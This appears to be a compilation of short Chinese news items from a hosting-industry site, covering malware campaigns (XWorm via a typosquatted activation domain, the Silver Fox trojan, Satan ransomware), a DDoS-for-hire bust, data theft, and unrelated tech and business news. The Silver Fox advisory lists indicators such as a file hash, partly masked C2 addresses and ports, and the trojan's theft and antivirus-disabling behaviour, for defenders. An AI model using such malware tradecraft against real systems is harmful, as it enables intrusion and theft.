从“get.activate.win”到XWorm后门的植入,此次攻击展现了黑客对用户操作习惯与域名注册规则的深度利用。无论是用户因拼写疏忽触发恶意脚本,还是企业因域名监控不足暴露风险,事件都指向一个核心问题:在开源工具生态中,安全意识与技术防护的双重缺位可能带来致命后果。主机帮提醒:若您依赖MAS等开源工具激活系统,请立即检查输入的域名拼写,并通过官方渠道验证脚本来源;对于企业或开发者,需将域名安全纳入开源工具管理的必修课,否则一次“少输一个字母”,可能让电脑沦为矿机或“肉鸡”。(注:本文基于BleepingComputer与Reddit社区的公开信息整理,具体攻击者身份与技术细节需以官方进一步披露为准。) #### “好评返现”被定为违法行为 涉嫌欺骗消费者 11月14日 消息:今日,针对商家在快递包裹、外卖里加塞“好评返现卡”的情况,南京市场监管局表示,“好评返现”“晒图返现”均为违法行为! 南京市场监管局称,2022年1月,市场监管总局制定了《禁止网络不正当竞争行为规定》,其中明确规定:经营者不得采取以返现、红包、卡券等方式诱导用户作出指定评价、点赞、转发、定向投票等互动行为。 同时,南京市场监管局提醒广大商家,经营者不得对用户评价作虚假或者引人误解的商业宣传,欺骗、误导消费者。电子商务经营者应当全面、真实、准确、及时地披露商品或者服务信息,保障消费者的知情权和选择权; 电子商务经营者不得以虚构交易、编造用户评价等方式进行虚假或者引人误解的商业宣传,欺骗、误导消费者。消费者享有知悉其购买、使用的商品或者接受的服务的真实情况的权利。 最后,市场监管局也呼吁广大消费者,在购物消费时理性客观评价共同抵制“好评返现”。 #### “小绿洲”电商平台10月1日停止运营 快科技9月3日消息,日前,小红书旗下电商平台小绿洲”突然发布用户告别信”,称因业务调整,计划2023年10月1日停止运营,商品停止销售,2023年10月31日正式关闭小绿洲。 官方表示,小绿洲曾深耕露营、陆冲、滑雪、骑行、徒步等运动场景,遗憾的是,在业务探索和发展过程中,没能实现最大化满足大家户外需求的预期目标,所以最终决定关停。 据悉,商品后续的售后问题,消费者可以通过小绿洲频道商品页面历史订单与客服进行联系。 店铺正式关闭后,消费者仍可通过订单页面申请售后进行反馈处理,公司始终会保障购物权益。 2022年初,小红书推出了自营电商项目小绿洲,初期主营包括美妆、护肤品、香氛、时尚家居等综合品类,户外露营大火后,平台又更改定位,产品主要针对露营、滑雪、骑行、徒步等运动场景。 #### “小黑”DDOS攻击平台被端,江苏网警打掉某猖狂发起“DDOS”攻击的犯罪团伙 2 月 11 日消息,据江苏网警发布,你有没有遇到过这种情况:某个网站突然打不开、服务器无法访问、网站自动跳转…… 这不一定是网络连接故障,很有可能是你登录的网站正在遭受黑客的 DDOS 攻击! 2021 年 8 月初,江苏徐州新沂警方在工作中发现,有一网站平台以开展“压力测试”为幌子,实际上是为他人有偿提供黑客工具,以实施 DDOS 攻击。更有甚者,该平台还宣称能提供“DDOS 代打”业务!掌握此情后,新沂市公安局网安大队立即成立专案组,全力开展案件侦办工作。 侦查发现,“小黑 DDOS 压力测试平台”网站开办者为增加圈内知名度,发展了多级代理提供网络攻击服务。用户注册账户后,用购买的卡密兑换相应天卡、周卡、月卡等 10 种套餐,然后使用上述套餐对目标 IP 实施攻击。 为了逃避监管,开办者将网站放在海外服务器上,以为这样就高枕无忧了。于是他们肆无忌惮,对境内外网站发送大量 SNTP / SSDP 协议的数据包实施攻击,流量峰值高达 21.61G / 秒,对目标服务器造成极强的攻击破坏。数月时间,平台注册会员 3 万余人,受攻击网站高达 1 万余个! 如此猖狂的行为,自然逃不过警方的追查。过程此处不便细说,总之,公安机关开展了大量工作,案件告破。 2021 年 8 月至 9 月,专案组先后赶赴河南、重庆、四川、广西、广东等 10 省 16 地市实施抓捕,成功抓获王某勇等犯罪嫌疑人 36 名,非法获利 300 余万元,起获用于实施违法犯罪的手机、硬盘、电脑等设备 60 余部。 目前,相关犯罪嫌疑人均已被检察机关提起公诉。 安防小贴士  1、系统加固。定期扫描漏洞安装补丁,关闭不必要的端口和服务,可以有效减少被入侵风险。 2、采用充足的网络带宽和高性能的网络设备。DDos 攻击主要是通过消耗网络资源中断设备运行,扩展充足的带宽,选用大品牌、口碑好的路由器、交换机、硬件防火墙等设备可以一定程度减少攻击影响,比如高防服务器,就是采用高带宽、高性能网络设备进行防御,同时配置软硬件防火墙进行防御。 3、接入高防产品。可以按照自身防护需求、网络环境来选择合适的高防产品,如高防IP、高防 CDN。比如像百度云加速就是非常受国内中小站长欢迎的高防CDN服务。 4、隐藏服务器的真实 IP 地址。通过隐藏源 IP,使攻击者无法直接攻击到源服务器,可有效保护网站安全,高防IP和高防CDN产品都具备有这个的效果。 #### “数据黑客”境外网站上大肆出售国内公民信息狂赚 2179 万 封面新闻记者 黄晓庆 2024 年 12 月 30 日,在内江市公安局“向人民汇报”新闻通气会上,内江市公安局网安支队通报了一起黑客通过攻击各地政企网站窃取公民数据,大肆贩卖至下游黑灰产领域的典型案例。 犯罪嫌疑人为网络安全公司、银行的高职位“内鬼”,他们不仅监守自盗,还编写代码成为黑客,窃取公民个人信息达 2.08 亿条。内江市公安局网安支队民警卢成介绍,2023 年 10 月,民警在巡查中发现:一团伙在境外网站上大肆出售公民个人信息,其数据来源多、数量规模大、数据极为精准,可能存在政务系统数据泄露的重大风险隐患。内江网安部门高度重视,立即成立专案组全力侦查。“这个犯罪团伙精通网络安全技术,作案手段极其隐蔽,不容易被发现。”侦办民警卢成表示,破案过程是一波三折,专案组通过大量的摸排、走访,采取传统侦查和技术侦查结合的方式,收集证据,最终侦破案件。 2024 年 2 月专案组实施收网行动,先后抓获犯罪嫌疑人 5 名,扣押非法所得 560 余万元,查获嫌疑人编写的黑客工具程序核心代码 30 余套,黑客虚拟机渗透攻击系统 10 余个,查获渗透脚本 270 个,涉及政企网站 57 个。查明该团伙窃取航班轨迹、文凭、住址等公民个人信息达 2.08 亿条,非法获利达 640 余万元。2024 年 3 月 13 日,该案被公安部列为部督案件进行挂牌督办。卢成透露,5 名犯罪嫌疑人均为男性,年龄在 30 岁到 40 岁之间,学历为本科乃至硕士学历,他们都有着体面的工作,工资收入也不低,却铤而走险走上了违法犯罪的道路。该团伙的核心成员为网络安全公司、银行的高管,他们监守自盗,利用自身学习掌握的技术与资源,秘密扫描各地银行、教育、医疗等平台漏洞,编写黑客程序越权获取公民个人信息,最后在境外网站上通过虚拟货币兜售,公民个人信息售价最高达 5 元/条。 犯罪嫌疑人将这些窃取来的公民数据,贩卖至下游黑灰产领域,极易引发和衍生精准诈骗、非法催收、网络色情、赌博引流等多种网络违法犯罪活动,严重影响人民群众生命财产安全。此案的成功侦破,迅速揪准了上游黑客、及时封堵了相关系统漏洞,从源头斩断了上下游黑灰产不法分子获取信息来源渠道,有效预防和制止了下游案事件的发生。今年以来,内江市公安机关网安部门持续推进“净网 2024 ”专项行动,成功破获公安部督办案件 1 起、涉网刑事案件 93 起,采取刑事强制措施 311 人,扣押涉案资金 4634 余万元,扣押涉案电脑61台,手机 343 部,案件打击质效在全省位列前茅。 #### “星火・链网”超级节点(北京)正式上线 8 月 1 日消息,据中国信通院消息,7 月 28 日-30 日,2022 全球数字经济大会在北京召开。会上,“星火・链网”超级节点(北京)上线仪式启动,标志着北京超级节点正式上线运行并开始向全球提供服务。 2018 年 12 月,工业互联网标识解析国家顶级节点(北京)在北京市顺义区完成上线并稳定运行,面向北方 9 个省(自治区、直辖市)的行业型、综合型二级节点及企业节点提供标识注册、解析等服务。 2022 年 3 月,顺义区人民政府与中国信通院共同签署了“星火・链网”超级节点(北京)合作协议,这标志着“星火・链网”超级节点正式落户北京。经过近半年的开发及建设部署,北京超级节点正式上线运行。 IT之家了解到,“星火・链网”是国家区块链新型基础设施,采用“主链 + 子链”的开放式链群架构。 其中,超级节点是“星火・链网”的顶层设施,定位于面向业务互通的数据交换网络。目前,武汉、重庆、北京等超级节点已上线运行,沈阳、重庆、济南、厦门等超级节点陆续启动建设。 #### “杂交水稻之父”袁隆平院士逝世 享年91岁 记者从中南大学湘雅医院获悉,“共和国勋章”获得者、中国工程院院士、国家杂交水稻工程技术研究中心主任、湖南省政协原副主席袁隆平,因多器官功能衰竭,于2021年5月22日13时07分在长沙逝世,享年91岁。 袁隆平是我国研究与发展杂交水稻的开创者,也是世界上第一个成功地利用水稻杂种优势的科学家,被誉为“杂交水稻之父”。他冲破经典遗传学观点的束缚,于1964年开始研究杂交水稻,成功选育了世界上第一个实用高产杂交水稻品种“南优2号”。杂交水稻的成果自1976年起在全国大面积推广应用,使水稻的单产和总产得以大幅度提高。20多年来,他带领团队开展超级杂交稻攻关,分别于2000年、2004年、2011年、2014年实现了大面积示范每公顷10.5吨、12吨、13.5吨、15吨的目标。最新育成的第三代杂交稻叁优一号,2020年作双季晚稻种植平均亩产达911.7公斤,加上第二代杂交早稻亩产619.06公斤,全年亩产达1530.76公斤,实现了周年亩产稻谷3000斤的攻关目标。 “发展杂交水稻,造福世界人民”是袁隆平毕生的追求。为了实现这一宏愿,他长期致力于促进杂交水稻走向世界。目前,杂交水稻已在印度、孟加拉、印度尼西亚、越南、菲律宾、美国、巴西、马达加斯加等国大面积种植,年种植面积达800万公顷,平均每公顷产量比当地优良品种高出2吨左右。 袁隆平1981年获得国家发明特等奖,2001年获得首届国家最高科学技术奖,2014年获得国家科学技术进步特等奖,2018年获“改革先锋”称号,2019年被授予“共和国勋章”。他还相继获得联合国教科文组织“科学奖”等二十余项国内国际大奖。 #### “点击宝SEO”和“精灵SEO计费系统”两快排软件遭百度索赔 今年开始,百度就各处起诉快排公司,起诉一家叫“万词霸屏”的公司,顺着把“点击宝SEO”和“精灵SEO计费系统”的公司也起诉了,索赔高达1000万元。 根据法院公告详情显示,百度起诉的这两家广州的公司共同赔偿百度经济损失及其合理开支1000万元,而且需要在其运营的“点击宝SEO”网站、“精灵SEO计费系统”网站首页《北京日报》《羊城晚报》《法制晚报》连续30天刊登声明、赔礼道歉。在北京市海淀区人民法院审理。 这两个快排软件的原理是通过大量“用户挂机”,用模拟真人点击的效果,对各个地区的关键词、广告进行点击优化。从而达到欺骗搜索引擎的目的,(某个词点击的阅读,百度蜘蛛就认为这个词和这个URL很热门,就容易获取优质的排名,有排名后就会有流量。)目前市面上的很多快排软件都是这个原理。百度很难判断这种作弊手段,因此只能只能通过起诉来解决。 百度曾多次打击快排,使得很多快排软件效果大减,甚至使用快排后,出现网站被降权的情况,因此,今年开始,主机吧发现大量做快排的都跑路了。 总之,不建议大家使用快排,非常不安全,网站降权后就很难做起来了。 #### “电报”(Telegram)创始人帕维尔·杜罗夫在法国被捕 根据最新消息:社交媒体“电报”(Telegram)创始人帕维尔·杜罗夫24日在法国被捕。 法国TF1电视台报道称,帕维尔·杜罗夫可能面临恐怖主义、洗钱和贩毒的指控。 俄罗斯国家杜马副主席达万科夫25日凌晨呼吁俄罗斯外交部设法解救杜罗夫,他表示已经向俄罗斯外交部长拉夫罗夫发出了相应的请求。俄罗斯外交部表示,俄罗斯驻法国大使馆已经采取了必要措施,以了解帕维尔·杜罗夫的有关情况。 帕维尔·杜罗夫1984年出生,媒体称他同时具有俄罗斯、法国、阿联酋等多国国籍。有报道称,由于帕维尔·杜罗夫是法国公民,因此不会被交换或引渡至其他国家。帕维尔·杜罗夫所创建的社交媒体“电报”(Telegram)是目前俄罗斯媒体和俄语用户所使用的最主要社交平台之一。 Telegram(非正式简称TG或电报、纸飞机),是跨平台的即时通讯软件,支持用户相互交换加密与自毁消息,发送照片、影片等所有类型文件。由帕维尔·杜罗夫于2013年创立,全球用户接近9亿,由于没有在国内监管范围,因为深受一些做灰色产业的用户喜爱。 #### “百度优选”上线,百度要玩AI电商了 在2023年5月25日的百度万象大会上,百度副总裁、百度电商总经理平晓黎宣布了一项重要的消息:百度正式上线电商品牌百度优选。此次上线意味着智能电商时代已经到来。 平晓黎将智能电商总结为三个词:懂你所想,知你所需,解你所优。他表示,通过人工智能技术,可以真正实现消费体验和生产效能的双提升。 目前百度APP内电商已拥有首页一级入口。点击进入便可看到名为“百度优选”的电商板块。此外,百度APP还将为电商应用配备以语义大模型能力为基础的AI导购助手服务。 平晓黎在大会上回顾了电商发展的二十年,指出货架电商一直是主流模式。然而,随着内容产业的发展,短视频和直播的兴起,内容电商高速增长颇为亮眼。这两个模式本质上是人找货和货找人的不同,说明用户购物的触发点是二者的结合。 “立足当下,我们看到,随着电商基础设施的成熟、商品数量极大丰富、购物渠道多样化,用户的购物期望在不断提升,商家的经营要求也在不断提高。在生产侧和消费侧都存在着不少痛点,这也正是人工智能可以发挥的地方。因此,我们大胆推测,以AI为依托、集合用户、媒体、商品、服务等多素重新组合的智能电商,将会竖起一面新的旗帜。” #### “舔狗”功能上线 淘宝“送礼物”功能上线,附详细教程 被戏称的为“舔狗”而生的“送礼物”功能上线啦,淘宝今日官宣“送礼物”功能正式上线,可以送朋友、送爸妈、送亲戚、送同事、送姐妹、送女友、送女神,新功能超详细保姆级教程现已公布,具体如下: 如何送礼: STEP1:在淘宝 App 商品页面,在【加入购物车】旁新增的【送礼】点击进入送礼新功能。 STEP2:根据商品页面选择适合的礼物规格【包括颜色、尺寸、数量、套餐等】。 STEP3:可以随机生成送礼祝福语,也可以亲自写下送给对方的真挚祝福或特别寄语,【赠语将在收礼人打开淘口令后展示在虚拟礼物盒上】。 STEP4:完成支付,设置安全口令,可以去送礼。 STEP5:分享给好友,淘口令 / 图片 / 直接分享都可以。 如何收礼: STEP1:收到礼物,复制淘口令 / 拍照识别,收礼人在淘宝端打开后,会展示虚拟礼物盒页面,拆封礼物盒可以查看礼物详情。 STEP2:收礼人填写收件详细地址信息,并且填入对应的 4 位数的安全口令,最后点击【收下礼物】,完成线上送礼过程。 对此,IT之家网友戏称舔狗经济 #### “草X社区”4名管理员被抓 发布原创不雅图片近5万张 7月16日 消息:据黑龙江晨报报道, 2018 年 10 月,成人网站“草X社区”某板块四名管理员被抓,四名犯罪嫌疑人因非法利用信息网络、制作、传播淫秽物品被提起公诉,目前已经进入量刑阶段。 警方称,该网站知名板块内一名为“CL分享团”的组织在全国发展分享团游客 2 万多人,发布网友自拍不雅图片 2000 余贴,内含原创不雅图片近 5 万张,帖子累计点击量近千万。分享团成员还进行线下聚众淫乱等网约活动。其中嫌疑人张某被称为“女神”,为活跃气氛会发色情自拍。 据了解,“草X社区”是华语圈知名的成人网站, 2006 年成立至今,日均浏览量超千万,网站的服务器在海外,采用邀请注册的封闭管理,只有长期会员才能邀请别人注册,“翻墙”到外网后才能看到色情内容,以此逃避我国公安机关的打击。 #### “视觉中国”维权维到“本地人”了,向原摄影师索赔闹笑话了 8 月 15 日,星空摄影师戴建峰(@Jeff 的星空之旅)发文称:“今天收到了视觉中国打来的电话,说我的公众号侵权使用了他们 173 张照片,还要赔偿他们 8 万多元!而当我打开内容一看,这些所谓的‘侵权照片’竟然是我自己拍摄的作品。” 针对此事“视觉中国”发布微博回应版权争议:“关于微博上出现的我司与摄影师 @Jeff 的星空之旅 之间的版权图片问题,我司高度重视,第一时间了解情况并已经和当事人取得了联系。经初步核实,涉事图片系该摄影师授权图片库 Stocktrek Images 进行销售,Stocktrek Images 又将相关图片授权给 Getty Images 销售。视觉中国作为 Getty Images 在中国大陆地区的独家合作伙伴,拥有对包括涉事相关图片在内的完整的销售权利,涉事图片的销售授权链条清晰完整。我们会继续与摄影师保持沟通,妥善处理相关误解。” 而星空摄影师戴建峰再度发文回应: 我不接受你们的观点。我已与 Stocktrek 进行核实,Stocktrek 明确告知我: @视觉中国 无权销售我的作品,也没有我作品的任何版权。Getty 也无权将我的作品再次转授。这里没有误会,到现在,你们依然在网上非法销售我的作品,向我与他人谎称你们拥有作品的著作权并索赔。请立即停止你们的侵权行为!!! 各位同学小心啦,别乱转载网图了,很容易中招,视觉中国就是国内图片版权大户,几乎国内好看的图片都有在库,一不小心就中招了。 #### “银狐”木马病毒本月再次出现新变种并更新传播手法,伪装成财税文件 12 月 20 日消息,国家计算机病毒应急处理中心今日宣布,与计算机病毒防治技术国家工程实验室依托国家计算机病毒协同分析平台在我国境内再次捕获发现针对我国用户的“银狐”(又名“游蛇”、“谷堕大盗”)木马病毒的最新变种。 相关病毒传播案例 近日,国家计算机病毒应急处理中心和计算机病毒防治技术国家工程实验室依托国家计算机病毒协同分析平台在我国境内再次捕获发现针对我国用户的“银狐”木马病毒的最新变种。在本次传播过程中,攻击者继续通过构造财务、税务违规稽查通知等主题的钓鱼信息和收藏链接,通过微信群直接传播包含该木马病毒的加密压缩包文件。 名为“笔记”等字样的收藏链接指向文件名为“违规-记录(1).rar”等压缩包文件,用户按照钓鱼信息给出的解压密码解压压缩包文件后,会看到以“开票-目录.exe”、“违规-告示.exe”等命名的可执行程序文件,这些可执行程序实际为“银狐”远控木马家族于 12 月更新传播的最新变种程序。如果用户运行相关恶意程序文件,将被攻击者实施远程控制、窃密等恶意操作,并可能被犯罪分子利用充当进一步实施电信网络诈骗活动的“跳板”。 病毒感染特征 钓鱼信息特征 本次发现攻击者使用的钓鱼信息仍然以伪造官方通知为主。结合年末特点,攻击者刻意强调“12 月”、“稽查”、“违规”等关键词,借此使潜在受害者增加紧迫感从而放松警惕。在钓鱼信息之后,攻击者继续发送附带所谓的相关工作文件的钓鱼链接。 文件特征 文件名:对于本次发现的新一批变种,犯罪分子继续将木马病毒程序的文件名设置为与财税、金融管理等相关工作具有密切联系的名称,以引诱相关岗位工作人员点击下载运行,如:“开票-目录”、“违规-记录”、“违规-告示”等。此次发现的新变种仍然只针对安装 Windows 操作系统的传统 PC 环境,犯罪分子也会在钓鱼信息中使用“请使用电脑版”等话术进行有针对性的诱导提示。 文件格式:本次发现的新变种以 RAR、ZIP 等压缩格式(内含 EXE 可执行程序)为主,与之前变种不同的是,此次攻击者为压缩包设置了解压密码,并在钓鱼信息中进行提示告知,以逃避社交媒体软件和部分安全软件的检测,使其具有更强的传播能力。 文件 HASH:34101194d27df8bc823e339d590e18f2 进程特征  木马病毒被安装运行后,会在操作系统中创建新进程,进程名与文件名相同,并从回联服务器下载其他恶意代码直接在内存中加载执行。 网络通信特征      回联地址为:156.***.***.90,端口号为:1217 命令控制服务器(C2)域名为:mm7ja.*****. cn,端口号为:6666 网络安全管理员可根据上述特征配置防火墙策略,对异常通信行为进行拦截。其中与 C2 地址的通信过程中,攻击者会收集受害主机的操作系统信息、网络配置信息、USB 设备信息、屏幕截图、键盘记录、剪切板内容等敏感数据。 其他特征 本次发现的新变种还具有主动攻击安全软件的功能,试图通过模拟用户鼠标键盘操作关闭防病毒软件。 防范措施 不要轻信微信群、QQ 群或其他社交媒体软件中传播的所谓政府机关和公共管理机构发布的通知及相关工作文件和官方程序(或相应下载链接),应通过官方渠道进行核实。 带密码的加密压缩包并不代表内容安全,针对类似此次传播的“银狐”木马病毒加密压缩包文件的新特点,用户可将解压后的可疑文件先行上传至国家计算机病毒协同分析平台进行安全性检测,并保持防病毒软件实时监控功能开启,将电脑操作系统和防病毒软件更新到最新版本。 一旦发现电脑操作系统的安全功能和防病毒软件在非自主操作情况下被异常关闭,应立即主动切断网络连接,对重要数据进行迁移和备份,并对相关设备进行停用直至通过系统重装或还原、完全的安全检测和安全加固后方可继续使用。 一旦发现微信、QQ 或其他社交媒体软件发生被盗现象,应向亲友和所在单位同事告知相关情况,并通过相对安全的设备和网络环境修改登录密码,对自己常用的计算机和移动通信设备进行杀毒和安全检查,如反复出现账号被盗情况,应在备份重要数据的前提下,考虑重新安装操作系统和防病毒软件并更新到最新版本。 #### “阿里云盘”上架苹果AppSotre1T存储空间5G极速下载 IT之家11月4日消息 8 月下旬, 阿里巴巴推出了一款名为 “阿里云网盘”的独立 App。该应用开发者为阿里旗下的阿里云团队,定位是为 C 端用户提供可靠安全的存储备份及智能相册等服务的网盘产品。 此前,阿里云网盘应用上架不久便在苹果 App Store 下架。如今,更名后的 “阿里云盘”已重新上架到苹果 App Store(阿里云盘:点此查看)。 需要注意的是,该应用目前依然采用邀请方式注册登录。IT之家发现,启动页面显示,阿里云盘拥有 1T 存储空间,支持 5G 极速下载。 App Store 应用页面则显示,阿里云盘是阿里云团队打造的智能云存储产品,为个人用户提供 “更快”、“更安全”、“更流畅”、“更智能”的个人云服务。 阿里云盘功能包括:超大存储空间、5G 极速下载,企业级的数据安全防护,智能相册、AI 分类、轻松找图。 #### “高防IP+百度云加速CDN”同时接入是否可行 最近有客户咨询主机吧:使用高防IP+百度云加速CDN同时接入是否可行? 这里主机吧给大家讲下,高防IP其实跟CDN是一个原理的,CDN是多个IP防御,而高防IP是一个独享IP防御,所以两个种产品都有独自防御系统,如果同时使用的话,两个防御系统可能会冲突,可能存在无法访问,网站异常等情况。 所以我们不大建议同时使用高防IP和百度云加速。当然如果必要的话你可以把两方的IP段加入白名单,使两方的防御系统不拦截对方IP,这样就可以正常使用,但我们要知道高防IP本身就是一个节点,如果再叠加CDN使用的话就相当于叠加了一个转发,理论上是会影响速度的。 还有一种是客户本身使用的是高防服务器的,这种就有区别于高防IP,高防服务器只要不开启CC防火墙是可以正常使用百度云加速CDN的。   #### “魔鬼”撒旦利用“永恒之蓝”漏洞卷土重来 攻击或主要针对企业服务器 自 2017 年 4 月发生轰动全球的NSA黑客武器库泄漏事件以来,“永恒之蓝”漏洞攻击工具带来的网络安全威胁从未间断。 近日,腾讯御见威胁情报中心发现“魔鬼”撒旦(Satan)勒索病毒携“永恒之蓝”漏洞攻击工具卷土重来,其专注加密服务器数据文件,并用中英韩三国语言勒索0. 3 个比特币作为赎金。目前国内已有用户中招,撒旦(Satan)勒索病毒威胁范围正在不断扩大。 根据监测数据显示,撒旦(Satan)勒索病毒首次出现 2017 年 1 月份,此次携手“永恒之蓝”漏洞攻击工具卷土重来,已感染了大量存在漏洞的机器,并通过主动攻击其他存在漏洞的系统的方式,在局域网内进行传播。目前腾讯电脑管家已实时拦截该勒索病毒,并提醒用户加强防范。 (腾讯电脑管家实时拦截该勒索病毒) 此外,专家指出撒旦(Satan)勒索病毒的攻击重心在于服务器数据库,提醒各企业用户及时修复系统漏洞。经腾讯御见威胁情报中心分析发现,后缀为.mdf、.ldf、.myd、myi、frm、dbf、.bak、.sql、.rar、.zip、.dmp等的文件,极易被该勒索病毒加密。对于拥有大量重要数据的企业用户而言,被加密的服务器数据库文件若无备份,将对企业正常业务造成不可逆的破坏。 从提供英语、汉语和韩语三种语言的勒索信息可以看出,撒旦(Satan)勒索病毒并非针对单个地区进行攻击。据勒索信息提示,受害者要想解密被加密的数据库文件,需要向不法分子支付0. 3 个比特币作为赎金,若三天内没有支付,文件将再也无法解密。 (Satan勒索病毒的勒索信息) 腾讯安全技术专家表示,利用“永恒之蓝”漏洞攻击工具进行袭击的撒旦(Satan)勒索病毒来势汹汹,但只要及时安装系统补丁就能有效防御此类攻击。建议个人用户日常应养成良好的电脑使用习惯,做好对抗勒索病毒的事前防御工作:尽量关闭不必要的端口采用高强度的密码,防止被黑客暴力破解;养成使用腾讯电脑管家等安全软件的习惯,保持安全软件正常开启状态,及时修复安全软件提示的系统高危漏洞。针对企业用户,腾讯企业安全”御点“将百亿量级云查杀病毒库、引擎库以及腾讯TAV杀毒引擎和系统修复引擎应用到企业内部,能有效防御企业内网终端的病毒木马攻击。 #### “鱿鱼币” 创始人跑路了 投资者损失至少达210万美元 11月3日 消息:随着奈飞网剧《鱿鱼游戏》爆火,一个以该品牌命名的加密货币——“鱿鱼币”诞生。过去一周内“鱿鱼币”最高涨幅达2300倍,币价达到惊人的2861.8美元(约合人民币18309元)。 然而,美东时间11月1日,该币种突然闪崩,从炙手可热的全球涨幅第一虚拟货币到币价近乎归零,鱿鱼币(SQUID)只用了几分钟。 截至发稿前,鱿鱼币价格跌至约合0.02元人民币,市值仅为5.87元。 根据鱿鱼币项目的白皮书显示,该项目是BSC公链上的一个虚拟货币游戏赚取平台,灵感来源于奈飞同名韩国热播剧。该币种于10月20日开始预售,1秒内全部售罄。 据媒体报道,鱿鱼币创始人曾表示,该项目是奈飞的官方代币合作伙伴。并与虚拟货币平台CoinGecko建立了战略合作关系。 目前,该项目的发行方已经卷款跑路,投资者损失至少达210万美元。分析显示,项目的创始人使用TornadoCash协议隐藏交易细节,从而转移资金,并兑现了等值的币安币(BNB)。该地址目前已经被注记为“涉及骗局”。 今年4月以来,包括中国、美国、印度、土耳其、韩国等多国陆续针对加密货币交易进行更加严格的监管,在短期来看,导致许多中小交易所不得不关停运营。 中国央行的官员在2021年7月曾表示各种所谓的加密货币已经成为投机性工具,也存在威胁金融安全和社会稳定的潜在风险,成为一些洗钱和非法经济活动的支付工具。随着新一轮监管风暴来临,国务院金融委明确提出“打击比特币挖矿和交易行为”。 所以,国内买币是违法的哈,各位站长千万别碰这玩意,国家打击是在保护你的财产安全,千万别想着一夜暴富的美梦,大家都不傻子。 #### 《中华人民共和国密码法》将于2020年1月1日起施行 10 月 28 日讯,据央视新闻报道,《中华人民共和国密码法》已由中华人民共和国第十三届全国人民代表大会常务委员会第十四次会议于 2019 年 10 月 26 日通过,自 2020 年 1 月 1 日起施行。 《中华人民共和国密码法》的通过,标志着我国在密码的应用和管理等方面有了专门性的法律保障。明确立法目的是“为了规范密码应用和管理,促进密码事业发展,保障网络与信息安全,维护国家安全和社会公共利益,保护公民、法人和其他组织的合法权益”,强调“坚持党对密码工作的领导”,规定“中央密码工作领导机构对全国密码工作实行统一领导”。国家密码管理部门——也就是国家密码管理局负责管理全国的密码工作。 《密码法》将密码分为核心密码、普通密码和商用密码三类,实行分类管理。其中核心密码、普通密码用于保护国家秘密信息,属于国家秘密;商用密码用于保护不属于国家秘密的信息,公民、法人和其他组织可以依法使用商用密码保护网络与信息安全。 #### 《孤注一掷》可以拍续集了 11 月 21 日消息,公安部今日发文,公安机关打击缅北涉我电信网络诈骗犯罪取得显著战果,累计 3.1 万名电信网络诈骗犯罪嫌疑人移交我方。 针对当前缅北涉我电信网络诈骗犯罪严峻形势,公安部部署云南等地公安机关持续推进边境警务执法合作,连续开展多轮打击行动,截至目前,缅北相关地方执法部门共向我方移交电信网络诈骗犯罪嫌疑人 3.1 万名,其中幕后“金主”、组织头目和骨干 63 名,网上在逃人员 1531 名,打击工作取得显著战果。 今年 9 月以来,在公安部和云南省公安厅指挥部署下,西双版纳、普洱、临沧等地公安机关与缅甸相关地方执法部门开展边境警务执法合作,开展一系列打击行动,一大批电信网络诈骗犯罪嫌疑人先后移交我方,取得显著战果。 进入 11 月后,为纵深推进打击行动,我公安机关进一步深化中缅警务执法合作,向缅北电信网络诈骗犯罪发起凌厉攻势,战果显著,捷报频传。我公安机关公开通缉的缅北果敢电信网络诈骗犯罪集团重要头目明国平、明菊兰、明珍珍被成功缉拿归案,首犯明学昌畏罪自杀,一大批境外诈骗窝点被成功铲除,狠狠打击了境外诈骗集团的嚣张气焰。 11 月 18 日,德宏公安机关边境警务执法合作取得重要突破,缅北木姐地区执法部门将 571 名电信网络诈骗犯罪嫌疑人陆续移交我方,对诈骗分子形成强大震慑。 截至目前,在缅甸各方的大力配合下,累计 3.1 万名电信网络诈骗犯罪嫌疑人移交我方,并被涉案地公安机关陆续押回。公安机关将彻查其全部违法犯罪事实,坚决依法予以严惩。 公安机关有关负责人表示,将始终保持对缅北电信网络诈骗犯罪集团高压严打态势,不断深化中缅边境警务执法合作,持续组织专项打击行动,全力清剿诈骗窝点,依法缉捕涉诈人员,坚决维护人民群众生命财产安全和合法权益,切实维护边境安全稳定。 ▲ 电信网络诈骗题材电影《孤注一掷》 #### 《守望先锋:归来》开服 服务器即遭到大规模DDoS 攻击 10 月 5 日消息,今日,团队动作游戏《守望先锋:归来》正式上线,支持免费游玩。新版本上线之际,部分玩家登录时遇到了服务器故障,提示“服务器发生意外错误”。 暴雪总裁 Mike Ybarra 今日凌晨通过 Twitter 表示,团队正在努力解决《守望先锋:归来》的服务器问题。我们为玩家的兴奋感到惭愧,并将继续关注问题,让玩家感受到乐趣。 随后,Mike Ybarra 补充道,服务器正在遭受大规模 DDoS 攻击。团队正在努力减轻 / 管理,这将导致许多掉线或连接问题。 需要注意的是,由于《守望先锋:归来》转变为免费游戏模式,所有玩家都必须为战网通行证绑定一个有效的手机号码后才能进入游戏。 #### 《我的世界》锦标赛遭受 DDoS 攻击,安道尔全国网络受影响 1 月 24 日消息,根据外媒 tomshardware 消息,Twitch 平台举行了为期数天的《我的世界》Minecraft 游戏锦标赛。这一线上赛事灵感来自于电视剧《鱿鱼游戏》,玩家扮演的游戏角色需要完成一系列闯关任务,层层淘汰,最终取得胜利。 在比赛期间,安道尔公国唯一的电信运营商 Andorra Telecom 遭受了 DDoS 网络攻击,使得 8 名以上该国参赛者掉线,失去游戏资格。该国的参与者经历了反复掉线又重连的过程,外媒推测,攻击者此举是为了淘汰更多选手,以赢得高达 10 万美元的冠军奖金。 《我的世界》本次 SquidCraft Games 赛事在海外备受期待,在 Twitch 平台最高收视率超过 100 万,奖金池达 10 万美元,将于当地时间本周二完赛。 这次 DDoS 攻击不仅影响到了游戏参与者,还影响到了安道尔的网络。在受到攻击之后的 1 小时,该国电信公司宣布网络已经恢复正常,然而被淘汰的游戏参与者已经无法重新加入。 目前 SquidCraft Games 比赛正在进行,已经持续了 6 天。截至发稿还剩下 42 名玩家。关于本次 DDoS 攻击的调查报告有望在后续发布,找到攻击者。 #### 《杀戮尖塔》Steam 创意工坊模组Downfall 遭黑客劫持,游戏自动更新“木马版本” 《杀戮尖塔》Steam 创意工坊模组 Downfall 黑客事件概述 《杀戮尖塔》Steam 创意工坊模组 Downfall 黑客事件发生在圣诞节期间,当时黑客劫持了模组开发者 Table 9 Studio 的账号,并上传了含有恶意木马的版本。这个木马版本通过Steam平台的创意工坊自动更新功能传播,导致许多玩家在不知情的情况下下载并安装了这个版本。安装后,木马会在用户启动游戏时弹出一个Unity库的窗口,并收集用户的密码信息,存放在用户的“AppData / Local / Temp / 